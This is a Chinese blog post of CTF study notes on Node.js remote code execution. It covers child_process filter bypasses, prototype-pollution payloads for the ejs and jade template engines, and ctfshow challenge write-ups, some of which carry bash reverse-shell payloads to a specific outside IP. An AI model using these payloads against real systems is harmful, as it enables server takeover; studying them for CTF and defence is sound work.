<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 7.1.1">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":true,"show_result":true,"style":"mac"},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"manual","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="nodejs的rce 1. child_process.exec():衍生shell并在该shell中运行命令，完成后将stdout和stderr传给回调函数。 2. child_process.spawn():该方法异步衍生子进程，不会阻塞Nodejs事件循环。 3. child_process.…">
<meta property="og:type" content="article">
<meta property="og:title" content="nodejs">
<meta property="og:url" content="http://example.com/2026/09/16/37-nodejs/index.html">
<meta property="og:site_name" content="Glut4micum">
<meta property="og:description" content="nodejs的rce 1. child_process.exec():衍生shell并在该shell中运行命令，完成后将stdout和stderr传给回调函数。 2. child_process.spawn():该方法异步衍生子进程，不会阻塞Nodejs事件循环。 3. child_process.…">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/yuque-notes/02-Knowledge%20Book/assets/6e5a16fd-image.png">
<meta property="og:image" content="http://example.com/yuque-notes/02-Knowledge%20Book/assets/f27284f3-image.png">
<meta property="og:image" content="http://example.com/yuque-notes/02-Knowledge%20Book/assets/968158fe-image.png">
<meta property="og:image" content="http://example.com/yuque-notes/02-Knowledge%20Book/assets/37fbc157-image.png">
<meta property="og:image" content="http://example.com/yuque-notes/02-Knowledge%20Book/assets/a83ba500-image.png">
<meta property="og:image" content="http://example.com/yuque-notes/02-Knowledge%20Book/assets/e48222e3-image.png">
<meta property="og:image" content="http://example.com/yuque-notes/02-Knowledge%20Book/assets/edc2b78d-image.png">
<meta property="og:image" content="http://example.com/yuque-notes/02-Knowledge%20Book/assets/ad1d52d9-image.png">
<meta property="og:image" content="http://example.com/yuque-notes/02-Knowledge%20Book/assets/cfac2e0d-image.png">
<meta property="og:image" content="http://example.com/yuque-notes/02-Knowledge%20Book/assets/5641d3f8-image.png">
<meta property="article:published_time" content="2026-09-16T14:20:04.000Z">
<meta property="article:modified_time" content="2026-09-16T14:20:04.000Z">
<meta property="article:author" content="谷氨酸棒状杆菌">
<meta property="article:tag" content="RCE">
<meta property="article:tag" content="Web安全">
<meta property="article:tag" content="Node.js">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/yuque-notes/02-Knowledge%20Book/assets/6e5a16fd-image.png">

<link rel="canonical" href="http://example.com/2026/09/16/37-nodejs/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>nodejs | Glut4micum</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Glut4micum</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>
  <div class="reading-progress-bar"></div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2026/09/16/37-nodejs/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="https://ice.frostsky.com/2024/03/16/1776051b6463e644bf0eb40aed808727.md.jpeg">
      <meta itemprop="name" content="谷氨酸棒状杆菌">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Glut4micum">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          nodejs
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2026-09-16 22:20:04" itemprop="dateCreated datePublished" datetime="2026-09-16T22:20:04+08:00">2026-09-16</time>
            </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E7%9F%A5%E8%AF%86%E7%AC%94%E8%AE%B0/" itemprop="url" rel="index"><span itemprop="name">知识笔记</span></a>
                </span>
            </span>

          
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="本文总阅读两 fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span>
            <div class="post-description">nodejs的rce 1. child_process.exec():衍生shell并在该shell中运行命令，完成后将stdout和stderr传给回调函数。 2. child_process.spawn():该方法异步衍生子进程，不会阻塞Nodejs事件循环。 3. child_process.…</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="nodejs"><a href="#nodejs" class="headerlink" title="nodejs"></a>nodejs</h1><h1 id="nodejs的rce"><a href="#nodejs的rce" class="headerlink" title="nodejs的rce"></a>nodejs的rce</h1><ol>
<li>child_process.exec():衍生shell并在该shell中运行命令，完成后将stdout和stderr传给回调函数。</li>
<li>child_process.spawn():该方法异步衍生子进程，不会阻塞Nodejs事件循环。</li>
<li>child_process.spawnSync()：该方法以同步方式提供等效的功能，其会阻塞事件循环，知道衍生的进程退出或者终止。</li>
<li>child_process.execSync():他是child_process.exec()的同步版本，它会阻塞Nodejs事件循环。</li>
</ol>
<p>child_process模块的使用例子如下：</p>
<p><code>require(&quot;child_process&quot;).exec(&quot;whoami&quot;,function(err,stdout,stderr){console.log(stdout);});</code></p>
<h2 id="过滤"><a href="#过滤" class="headerlink" title="过滤"></a>过滤</h2><p>如果点被过滤可以用[]代替调用方法</p>
<p><code>require(&quot;child_process&quot;)[exec](&quot;ls&quot;)</code></p>
<p>拼接绕过</p>
<p><code>require(&quot;child_process&quot;)[&quot;ex&quot;+&quot;ec&quot;](&quot;ls&quot;)</code></p>
<p>16进制绕过</p>
<p><code>require(&quot;child_process&quot;)[&quot;\x65\x78\x65\x63&quot;](&quot;ls&quot;)</code></p>
<p>Unicode编码</p>
<p><code>require(&quot;child_process&quot;)[&quot;\u0065\u0078\u0065\u0063&quot;](&quot;ls&quot;)</code></p>
<p>concat拼接绕过：</p>
<p><code>require(&quot;child_process&quot;)[&quot;exe&quot;.concat(&quot;cSync&quot;)](&quot;ls&quot;)</code></p>
<p>Base64编码绕过</p>
<h2 id="Obejct-values"><a href="#Obejct-values" class="headerlink" title="Obejct.values"></a>Obejct.values</h2><p>object.values(obj)会返回一个数组,成员是参数对象自身的（不含继承的）所有可遍历属性的键,利用这个我们可以获取到child_process的方法,</p>
<p><img src="/yuque-notes/02-Knowledge%20Book/assets/6e5a16fd-image.png" alt="image.png"></p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> x = <span class="title class_">Object</span>.<span class="title function_">values</span>(<span class="built_in">require</span>(<span class="string">&quot;child_process&quot;</span>))[<span class="number">4</span>](&lt;<span class="string">&#x27;ls&#x27;</span>&gt;).<span class="title function_">tostring</span>();</span><br><span class="line"><span class="variable language_">console</span>.<span class="title function_">log</span>(x);</span><br></pre></td></tr></table></figure>

<p>另外一些形式的payload</p>
<p><code>global.process.mainModule.constructor._load(&#39;child_process&#39;).exec(&#39;calc&#39;)</code></p>
<h1 id="ejs"><a href="#ejs" class="headerlink" title="ejs"></a>ejs</h1><p>payload</p>
<ol>
<li><code>{&quot;__proto__&quot;:{&quot;__proto__&quot;:{&quot;outputFunctionName&quot;:&quot;_tmp1;global.process.mainModule.require(&#39;child_process&#39;).exec(&#39;bash -c \&quot;bash -i &gt;&amp; /dev/tcp/114.116.119.253/7777/port 0&gt;&amp;1\&quot;&#39;);var __tmp2&quot;}}}</code></li>
<li><code>{&quot;__proto__&quot;:{&quot;__proto__&quot;:{&quot;outputFunctionName&quot;:&quot;_tmp1;global.process.mainModule.require(\&#39;child_process\&#39;).exec(\&#39;calc\&#39;);var __tmp2&quot;}}}</code></li>
</ol>
<p>通过污染最上层影响整个模板</p>
<h1 id="jade"><a href="#jade" class="headerlink" title="jade"></a>jade</h1><p>&#96;</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">1.</span><br><span class="line">&#123;&quot;__proto__&quot;:&#123;&quot;self&quot;:&quot;true&quot;,&quot;line&quot;:&quot;2,jade_debug[0].filename));return global.process.mainModule.require(\&#x27;child_process\&#x27;).exec(\&#x27;calc\&#x27;)//&quot;&#125;&#125;</span><br><span class="line">2. </span><br><span class="line">&#123;&quot;__proto__&quot;:&#123;&quot;self&quot;:1,&quot;line&quot;:&quot;global.process.mainModule.require(\&#x27;child_process\&#x27;).exec(\&#x27;calc\&#x27;)&quot;&#125;&#125;</span><br></pre></td></tr></table></figure>

<h1 id="ctfshow"><a href="#ctfshow" class="headerlink" title="ctfshow"></a>ctfshow</h1><h2 id="334"><a href="#334" class="headerlink" title="334"></a>334</h2><p>下载zip文件,在user.js文件里面有账号和密码,在登陆界面内登录即可</p>
<h2 id="335"><a href="#335" class="headerlink" title="335"></a>335</h2><p>nodejs的rce</p>
<p>payload&#x3D;<code>?eval=require(&quot;child_process&quot;).execSync(&#39;cat f*&#39;)</code></p>
<h2 id="336"><a href="#336" class="headerlink" title="336"></a>336</h2><p>通过变量读取当前文件目录 __filename,过滤了exec,随便选一个绕过方式,+绕过的话要对+进行url编码,%2b</p>
<p>__filename:给出绝对路径</p>
<p>__dirname:当前目录的相对路径</p>
<p>读取文件:<code>val=require(‘fs’).readFileSync(’/app/routes/index.js’,‘utf-8’)</code></p>
<h2 id="337"><a href="#337" class="headerlink" title="337"></a>337</h2><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> express = <span class="built_in">require</span>(<span class="string">&#x27;express&#x27;</span>);</span><br><span class="line"><span class="keyword">var</span> router = express.<span class="title class_">Router</span>();</span><br><span class="line"><span class="keyword">var</span> crypto = <span class="built_in">require</span>(<span class="string">&#x27;crypto&#x27;</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">md5</span>(<span class="params">s</span>) &#123;</span><br><span class="line">  <span class="keyword">return</span> crypto.<span class="title function_">createHash</span>(<span class="string">&#x27;md5&#x27;</span>)</span><br><span class="line">    .<span class="title function_">update</span>(s)</span><br><span class="line">    .<span class="title function_">digest</span>(<span class="string">&#x27;hex&#x27;</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">/* GET home page. */</span></span><br><span class="line">router.<span class="title function_">get</span>(<span class="string">&#x27;/&#x27;</span>, <span class="keyword">function</span>(<span class="params">req, res, next</span>) &#123;</span><br><span class="line">  res.<span class="title function_">type</span>(<span class="string">&#x27;html&#x27;</span>);</span><br><span class="line">  <span class="keyword">var</span> flag=<span class="string">&#x27;xxxxxxx&#x27;</span>;</span><br><span class="line">  <span class="keyword">var</span> a = req.<span class="property">query</span>.<span class="property">a</span>;</span><br><span class="line">  <span class="keyword">var</span> b = req.<span class="property">query</span>.<span class="property">b</span>;</span><br><span class="line">  <span class="keyword">if</span>(a &amp;&amp; b &amp;&amp; a.<span class="property">length</span>===b.<span class="property">length</span> &amp;&amp; a!==b &amp;&amp; <span class="title function_">md5</span>(a+flag)===<span class="title function_">md5</span>(b+flag))&#123;</span><br><span class="line">  	res.<span class="title function_">end</span>(flag);</span><br><span class="line">  &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">  	res.<span class="title function_">render</span>(<span class="string">&#x27;index&#x27;</span>,&#123; <span class="attr">msg</span>: <span class="string">&#x27;tql&#x27;</span>&#125;);</span><br><span class="line">  &#125;</span><br><span class="line">  </span><br><span class="line">&#125;);</span><br><span class="line"></span><br><span class="line"><span class="variable language_">module</span>.<span class="property">exports</span> = router;</span><br></pre></td></tr></table></figure>

<p><code>a &amp;&amp; b &amp;&amp; a.length===b.length &amp;&amp; a!==b &amp;&amp; md5(a+flag)===md5(b+flag)</code>这串代码是关键信息</p>
<p>传入a[:]&#x3D;1&amp;b[:]&#x3D;2即可绕过,a与中括号内的内容要相同</p>
<h2 id="338"><a href="#338" class="headerlink" title="338"></a>338</h2><h3 id="原型链污染"><a href="#原型链污染" class="headerlink" title="原型链污染"></a>原型链污染</h3><p><strong>proto</strong>:对象的__proto__属性，指向类的原型对象prototype</p>
<p>污染原型链,使对象去获取已经被污染了的原型,实现变量覆盖之类的</p>
<p>本题下载压缩包,在app.js里面发现,在routes文件夹里面有源码和登录源码,</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(secert.ctfshow===<span class="string">&#x27;36dboy&#x27;</span>)&#123;</span><br><span class="line">  res.end(flag);</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">  <span class="keyword">return</span> res.json(&#123;ret_code: <span class="number">2</span>, ret_msg: <span class="string">&#x27;登录失败&#x27;</span>+JSON.stringify(user)&#125;);  </span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>关键是要使secert的原型链的ctfshow污染为36dboy,通过if判断,burpsuite抓包修改为下图再发包即可</p>
<p><img src="/yuque-notes/02-Knowledge%20Book/assets/f27284f3-image.png" alt="image.png"></p>
<p>注:nodejs的环境容易崩掉,只能打一次,否则需要重启靶场</p>
<h2 id="339"><a href="#339" class="headerlink" title="339"></a>339</h2><p>在login文件里只设置了一个虚假的flag,我们需要在login文件进行原型链污染,再调用api路由的</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">router.<span class="title function_">post</span>(<span class="string">&#x27;/&#x27;</span>, <span class="built_in">require</span>(<span class="string">&#x27;body-parser&#x27;</span>).<span class="title function_">json</span>(),<span class="keyword">function</span>(<span class="params">req, res, next</span>) &#123;</span><br><span class="line">  res.<span class="title function_">type</span>(<span class="string">&#x27;html&#x27;</span>);</span><br><span class="line">  res.<span class="title function_">render</span>(<span class="string">&#x27;api&#x27;</span>, &#123; <span class="attr">query</span>: <span class="title class_">Function</span>(query)(query)&#125;);</span><br><span class="line">   </span><br><span class="line">&#125;);</span><br></pre></td></tr></table></figure>

<p>Function()匿名函数:</p>
<p><code>Function(&quot;return x;&quot;);</code>,匿名函数特性,需要有return</p>
<p>api中的函数相当于嵌套,将后一个括号的内容当作参数给第一个括号,可以在此进行变量覆盖</p>
<p>payload:<code>{&quot;__proto__&quot;:{&quot;query&quot;:&quot;return global.process.mainModule.constructor._load(&#39;child_process&#39;).exec(&#39;bash -c \&quot;bash -i &gt;&amp; /dev/tcp/114.116.119.253/7777 0&gt;&amp;1\&quot;&#39;)&quot;}}</code></p>
<p>反弹shell</p>
<p><img src="/yuque-notes/02-Knowledge%20Book/assets/968158fe-image.png" alt="image.png"></p>
<p><img src="/yuque-notes/02-Knowledge%20Book/assets/37fbc157-image.png" alt="image.png"></p>
<p>监听到了后,ls没有找到相关文件,查看evn 配置文件,在其中找到flag</p>
<p><img src="/yuque-notes/02-Knowledge%20Book/assets/a83ba500-image.png" alt="image.png"></p>
<p><img src="/yuque-notes/02-Knowledge%20Book/assets/e48222e3-image.png" alt="image.png"></p>
<h2 id="340"><a href="#340" class="headerlink" title="340"></a>340</h2><p>跟上一题比较,套了两层,需要污染两层原型链</p>
<p><img src="/yuque-notes/02-Knowledge%20Book/assets/edc2b78d-image.png" alt="image.png"></p>
<p>从login文件可以看出</p>
<p>payload&#x3D;<code>{&quot;__proto__&quot;:{&quot;__proto__&quot;:{&quot;query&quot;:&quot;return global.process.mainModule.constructor._load(&#39;child_process&#39;).exec(&#39;bash -c \&quot;bash -i &gt;&amp; /dev/tcp/114.116.119.253/7777 0&gt;&amp;1\&quot;&#39;)&quot;}}}</code></p>
<p>剩下的步骤等同于上一题</p>
<h1 id="原型链污染-1"><a href="#原型链污染-1" class="headerlink" title="原型链污染"></a>原型链污染</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">Parent</span> (<span class="params"></span>) </span>&#123;</span><br><span class="line">    this.name = <span class="string">&#x27;kevin&#x27;</span>;</span><br><span class="line">&#125;</span><br><span class="line">Parent.prototype.getName = <span class="function"><span class="keyword">function</span> (<span class="params"></span>) </span>&#123;</span><br><span class="line">    console.<span class="title function_ invoke__">log</span>(this.name);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">Child</span> (<span class="params"></span>) </span>&#123;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line">Child.prototype = <span class="keyword">new</span> <span class="title class_">Parent</span>();</span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> child1 = <span class="keyword">new</span> <span class="title class_">Child</span>();</span><br><span class="line">console.<span class="title function_ invoke__">log</span>(child1.<span class="title function_ invoke__">getName</span>()) <span class="comment">// kevin</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>当「方法」的 prototype 指定对象原型之后，当试图访问该类的对象属性时，它不仅仅在该对象上搜寻，还会搜寻该对象的原型，以及该对象的原型的原型，依次层层向上搜索，直到找到一个名字匹配的属性或到达原型链的末尾,类似于会去找自己的父类,一层层往上寻找</p>
<h2 id="merge-a-b"><a href="#merge-a-b" class="headerlink" title="merge(a.b)"></a>merge(a.b)</h2><p>把右边的所有对象属性赋值给左边</p>
<p><img src="/yuque-notes/02-Knowledge%20Book/assets/ad1d52d9-image.png" alt="image.png"></p>
<p><img src="/yuque-notes/02-Knowledge%20Book/assets/cfac2e0d-image.png" alt="image.png"></p>
<p><img src="/yuque-notes/02-Knowledge%20Book/assets/5641d3f8-image.png" alt="image.png"></p>
<p>变量覆盖,原型链污染</p>
<hr>
<p>来源: <a target="_blank" rel="noopener" href="https://www.yuque.com/guansuanbangzhuangganjun/oxmbxg/ee7g8p4436vti0ie">https://www.yuque.com/guansuanbangzhuangganjun/oxmbxg/ee7g8p4436vti0ie</a><br>语雀文档ID: 148315327</p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/RCE/" rel="tag"># RCE</a>
              <a href="/tags/Web%E5%AE%89%E5%85%A8/" rel="tag"># Web安全</a>
              <a href="/tags/Node-js/" rel="tag"># Node.js</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2026/09/16/36-XSS/" rel="prev" title="XSS">
      <i class="fa fa-chevron-left"></i> XSS
    </a></div>
      <div class="post-nav-item">
    <a href="/2026/09/16/39-%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E5%81%9A%E9%A2%98%E6%80%BB%E7%BB%93/" rel="next" title="命令执行做题总结">
      命令执行做题总结 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#nodejs"><span class="nav-number">1.</span> <span class="nav-text">nodejs</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#nodejs%E7%9A%84rce"><span class="nav-number">2.</span> <span class="nav-text">nodejs的rce</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E8%BF%87%E6%BB%A4"><span class="nav-number">2.1.</span> <span class="nav-text">过滤</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Obejct-values"><span class="nav-number">2.2.</span> <span class="nav-text">Obejct.values</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#ejs"><span class="nav-number">3.</span> <span class="nav-text">ejs</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#jade"><span class="nav-number">4.</span> <span class="nav-text">jade</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#ctfshow"><span class="nav-number">5.</span> <span class="nav-text">ctfshow</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#334"><span class="nav-number">5.1.</span> <span class="nav-text">334</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#335"><span class="nav-number">5.2.</span> <span class="nav-text">335</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#336"><span class="nav-number">5.3.</span> <span class="nav-text">336</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#337"><span class="nav-number">5.4.</span> <span class="nav-text">337</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#338"><span class="nav-number">5.5.</span> <span class="nav-text">338</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%8E%9F%E5%9E%8B%E9%93%BE%E6%B1%A1%E6%9F%93"><span class="nav-number">5.5.1.</span> <span class="nav-text">原型链污染</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#339"><span class="nav-number">5.6.</span> <span class="nav-text">339</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#340"><span class="nav-number">5.7.</span> <span class="nav-text">340</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%8E%9F%E5%9E%8B%E9%93%BE%E6%B1%A1%E6%9F%93-1"><span class="nav-number">6.</span> <span class="nav-text">原型链污染</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#merge-a-b"><span class="nav-number">6.1.</span> <span class="nav-text">merge(a.b)</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="谷氨酸棒状杆菌"
      src="https://ice.frostsky.com/2024/03/16/1776051b6463e644bf0eb40aed808727.md.jpeg">
  <p class="site-author-name" itemprop="name">谷氨酸棒状杆菌</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">64</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">2</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">94</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/Glut4micum" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;Glut4micum" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2026</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">谷氨酸棒状杆菌</span>
</div>

<!--
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div> -->

        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="总访客量 fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
